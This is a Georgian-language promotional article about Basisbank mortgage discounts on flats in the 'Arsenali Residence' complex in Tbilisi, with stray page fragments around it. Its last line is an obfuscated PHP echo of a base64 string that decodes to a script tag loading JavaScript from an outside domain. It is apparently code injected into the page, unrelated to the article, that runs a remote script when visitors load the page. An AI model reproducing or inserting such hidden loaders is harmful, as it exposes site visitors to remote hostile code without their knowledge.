celsiusi
ავერსი საქკაბელი

 ბაზისბანკი და დეველოპერული კომპანია „არსენალი რეზიდენსი“ ავლაბარში, სამებასთან მდებარე გამორჩეულ მულტიფუნქციურ უბანში ბინის შეძენის მსურველებს სპეციალურ შეთავაზებებს სთავაზობს.

„არსენალი რეზიდენსი“ მოიცავს 4 დამოუკიდებელ საცხოვრებელ ბლოკს, საოფისე და კომერციულ სივრცეებს, რომლის მშენებლობაც 2023 წლის იანვარში დაიწყო და აქტიურ ფაზაშია. A და B ბლოკების მშნებლობა 2024 წლის დეკემბერში სრულდება და მობინადრეები მომავალი წლიდან სარემონტო სამუშაოების დაწყებას შეძლებენ.

ბაზისბანკის იპოთეკური სესხით ბინის შეძენის მსურველებს შესაძლებლობა აქვთ მიიღონ 10,000 ლარიდან - 40,000 ლარამდე ფასდაკლება 1, 2 ან 3 საძინებლიან ბინებზე.

ბაზისბანკში იპოთეკური სესხი გაიცემა 10.5%-დან, ეფექტური 12.29%-დან. ბინის შეძენის მსურველებს ბაზისბანკი გამარტივებულ იპოთეკურ სესხს სთავაზობს. განაცხადის შევსება შესაძლებელია ონლაინ.

“არსენალი რეზიდენსი” გამორჩეული საცხოვრებელი და საინვესტიციო პროექტია, რომელიც თავისი არქიტექტურით და ძველი თბილისისთვის დამახასიათებელი ავთენტური, მშვიდი და ამავე დროს დინამიური გარემოთი აუცილებლად მიიზიდავს მათ, ვინც ბინას მხოლოდ ფიზიკური მახასიათებლების გამო არ ირჩევს. “არსენალი რეზიდენსს” ირჩევენ ადამიანები, რომელთათვის მნიშვნელოვანია ემოციები, რომელსაც საცხოვრებელი გარემო ქმნის.

კომპლექსში გათვალისწინებულია საცურაო აუზი, სპა და ფიტნეს სივრცეები, 500 ავტომობილზე გათვლილი ორდონიანი მიწისქვეშა პარკინგი. კომპლექსის ტერიტორიაზე განთავსდება კაფე, რესტორანი, სუპერმარკეტი, აფთიაქი და ბანკი, რაც მობინადრეებს შესაძლებლობას მისცემს ტერიტორიის დატოვების გარეშე მიიღონ სასურველი სერვისი.

გააკეთეთ საუკეთესო არჩევანი, შეიძინეთ ბინა ბაზისბანკის გამარტივებული იპოთეკური სესხით მინიმუმ 15% თანამონაწილეობით, მხოლოდ შესაძენი უძრავი ქონების უზრუნველყოფით და მიიღეთ საუკეთესო შეთავაზებები.

დამატებითი ინფორმაციისთვის დაგვიტოვეთ საკონტაქტო ან დაგვირეკეთ *9292

136
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");